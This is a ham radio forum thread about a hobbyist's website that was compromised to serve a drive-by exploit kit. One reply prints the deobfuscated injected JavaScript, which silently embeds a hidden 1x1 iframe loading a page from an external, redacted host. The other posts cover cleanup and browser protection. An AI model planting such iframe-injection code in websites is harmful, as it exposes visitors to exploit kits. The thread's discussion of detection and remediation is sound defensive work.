Call Search
     

New to Ham Radio?
My Profile

Community
Articles
Forums
News
Reviews
Friends Remembered
Strays
Survey Question

Operating
Contesting
DX Cluster Spots
Propagation

Resources
Calendar
Classifieds
Ham Exams
Ham Links
List Archives
News Articles
Product Reviews
QSL Managers

Site Info
eHam Help (FAQ)
Support the site
The eHam Team
Advertising Info
Vision Statement
About eHam.net

   Home   Help Search  
Pages: [1]   Go Down
  Print  
Author Topic: WA2ISE website hacked?  (Read 3522 times)
W8AAZ
Member

Posts: 348




Ignore
« on: January 28, 2013, 06:15:48 PM »

I have often gone to the WA2ISE website to get submini tube info and he also has other stuff on the website.  However today I went there and got nothing but warning popups from my antivirus saying that there were malware attacks from the site that it was blocking.  I wonder how to contact him to give a heads up.  As his contact info is on the messed up webpage!   
Logged
WN2C
Member

Posts: 466




Ignore
« Reply #1 on: January 28, 2013, 07:51:00 PM »

I sent him a PM on the Zed
Logged
G8HQP
Member

Posts: 124




Ignore
« Reply #2 on: January 30, 2013, 06:10:09 AM »

Good. My anti-virus reported it had foiled an attack from that site. Let's hope he can soon fix it and be back up again.
Logged
W8AAZ
Member

Posts: 348




Ignore
« Reply #3 on: January 30, 2013, 03:12:57 PM »

On another forum a poster replied that he had no problem, his APPLE computer reported no threats. Those folks never get over gloating....
Logged
G8HQP
Member

Posts: 124




Ignore
« Reply #4 on: February 01, 2013, 07:25:44 AM »

Someone running Linux could have a look and report back? I should have thought of that a few days ago, but I have just had to tidy the table and so clear away my Raspberry Pi for a while.
Logged
W8AAZ
Member

Posts: 348




Ignore
« Reply #5 on: February 01, 2013, 02:42:58 PM »

Tried it again today, white screen and popup message that the threat was blocked, something called "exploit blackhole exploit kit"  or some such, as the warning popup window unpops itself fairly soon.  I do not try to push my luck by pursueing  beyond that warning.  Too bad.  Another site I frequented for years got something rather nasty that would actually make me spend an afternoon debugging the computer.  I sent them warning about it.  Went back a week or so later and still got attacked.  Stayed away for many months and eventually it was safe to use again, but they had changed the format of the site so much I didn't like it, anyway.
Logged
KE4DRN
Member

Posts: 3729




Ignore
« Reply #6 on: February 01, 2013, 05:54:54 PM »

hi,

just tried the site and it works fine,
firefox and running trend micro here at the office.

73 james
Logged
DJ1YFK
Member

Posts: 191


WWW

Ignore
« Reply #7 on: February 02, 2013, 08:57:02 AM »

There's a bit of JavaScript code embedded on that site that most certainly does not belong there.

It contains an array of scrambled JavaScript code which is then translated into some more JavaScript which, when executed, embeds an iframe into the site. This iframe, most likely on another hacked website, probably contained something malicious, but it doesn't seem to exist anymore (Error 404). Probably the owner of that other website (with an Italian domain name, probably completely unrelated to WA2ISE) has noticed the breach and cleaned up his server.

Code:
(function () {
    var fe = document.createElement('iframe');

    fe.src = 'http://EDITED.it.invalid/esd.php';
    fe.style.position = 'absolute';
    fe.style.border = '0';
    fe.style.height = '1px';
    fe.style.width = '1px';
    fe.style.left = '1px';
    fe.style.top = '1px';

    if (!document.getElementById('fe')) {
        document.write('<div id=\'fe\'></div>');
        document.getElementById('fe').appendChild(fe);
    }

})();

Bottom line: There's still some JavaScript on that website which doesn't belong there. but it isn't harmful. However the owner of the website should remove it, try to find out how it got there, and at the very least change his access password etc. to make further breakins of this kind less likely to happen.

To protect oneself from problems by such malicious code from random websites, I highly recommend to switch off JavaScript in the browser off by default. For Firefox there's a great plugin called NoScript (http://www.noscript.net/) which allows very fine grained script settings to be made for each website. There are similar things for other browsers too.

73
Fabian, DJ1YFK
« Last Edit: February 02, 2013, 09:02:46 AM by DJ1YFK » Logged

W0BTU
Member

Posts: 1708


WWW

Ignore
« Reply #8 on: February 03, 2013, 12:04:28 AM »

There's a bit of JavaScript code embedded on that site that most certainly does not belong there. ... I highly recommend to switch off JavaScript in the browser off by default. For Firefox there's a great plugin called NoScript (http://www.noscript.net/)

Good observation, and great advice. I wouldn't think of using anything but Firefox and NoScript.
Logged

WA2ISE
Member

Posts: 158




Ignore
« Reply #9 on: March 27, 2014, 08:19:12 PM »

I found this infection sometime in Feb of last year (2013).  I had two computers, one with Norton, the other with MaCafee.  The Norton machine would block my web site, but MacAfee didn't.  I looked at the html source code, didn't see anything, but when I ftp'ed that code to my MacAfee machine, it reported it found something and stripped it out before saving it to a file on my PC.  I then ftp'ed this back to the web site, overwriting the old file.  The Norton machine stopped blocking this particular page.  I then did the same thing to all the rest of the html files, letting MacAfee strip the crap off, and then sending them back, overwriting the infection files. 

The web page hosting server tightened the security surrounding FTP.  "require explicit FTP over TLS"
Logged
G8HQP
Member

Posts: 124




Ignore
« Reply #10 on: March 29, 2014, 12:07:38 PM »

I'm glad you were able to fix it. I enjoy visiting your site from time to time!
Logged
W0BTU
Member

Posts: 1708


WWW

Ignore
« Reply #11 on: March 29, 2014, 12:48:11 PM »

I found this infection sometime in Feb of last year (2013).  ... The web page hosting server tightened the security surrounding FTP.  "require explicit FTP over TLS"

I had a site or two hacked because some of the folders had public write permissions. That's something you might look at.
Logged

Pages: [1]   Go Up
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.11 | SMF © 2006-2009, Simple Machines LLC Valid XHTML 1.0! Valid CSS!